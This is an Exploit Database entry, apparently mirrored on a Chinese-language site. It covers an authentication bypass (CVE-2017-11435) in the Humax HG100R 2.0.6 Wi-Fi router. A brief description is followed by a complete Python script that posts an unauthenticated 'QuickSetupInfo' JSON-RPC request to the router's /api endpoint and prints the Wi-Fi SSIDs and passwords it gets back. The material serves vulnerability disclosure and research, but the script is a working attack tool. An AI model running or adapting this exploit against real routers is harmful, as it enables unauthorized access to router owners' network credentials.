Humax Wi-Fi Router HG100R 2.0.6 – Authentication Bypass

• Exploit Database
• 45 阅读

• 作者： Kivson
  日期： 2017-09-14
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/42732/

• # coding: utf-8
  
  # Exploit Title: Humax HG100R-* Authentication Bypass
  # Date: 14/09/2017
  # Exploit Author: Kivson
  # Vendor Homepage: http://humaxdigital.com
  # Version: VER 2.0.6
  # Tested on: OSX Linux
  # CVE : CVE-2017-11435
  
  
  # The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially
  # crafted requests to the management console. The bug is exploitable remotely when the router is configured to
  # expose the management console.
  # The router is not validating the session token while returning answers for some methods in url '/api'.
  # An attacker can use this vulnerability to retrieve sensitive information such
  # as private/public IP addresses, SSID names, and passwords.
  
  import sys
  import requests
  
  
  def print_help():
  print('Exploit syntax error, Example:')
  print('python exploit.py http://192.168.0.1')
  
  
  def exploit(host):
  print(f'Connecting to {host}')
  path = '/api'
  payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
  
  response = requests.post(host + path, data=payload)
  response.raise_for_status()
  
  if 'result' not in response.json() or 'WiFi_Info' not in response.json()['result'] or 'wlan' not in \
  response.json()['result']['WiFi_Info']:
  print('Error, target may be no exploitable')
  return
  
  for wlan in response.json()['result']['WiFi_Info']['wlan']:
  print(f'Wifi data found:')
  print(f'SSID: {wlan["ssid"]}')
  print(f'PWD: {wlan["password"]}')
  
  
  def main():
  if len(sys.argv) < 2:
  print_help()
  return
  host = sys.argv[1]
  exploit(host)
  
  
  if __name__ == '__main__':
  main()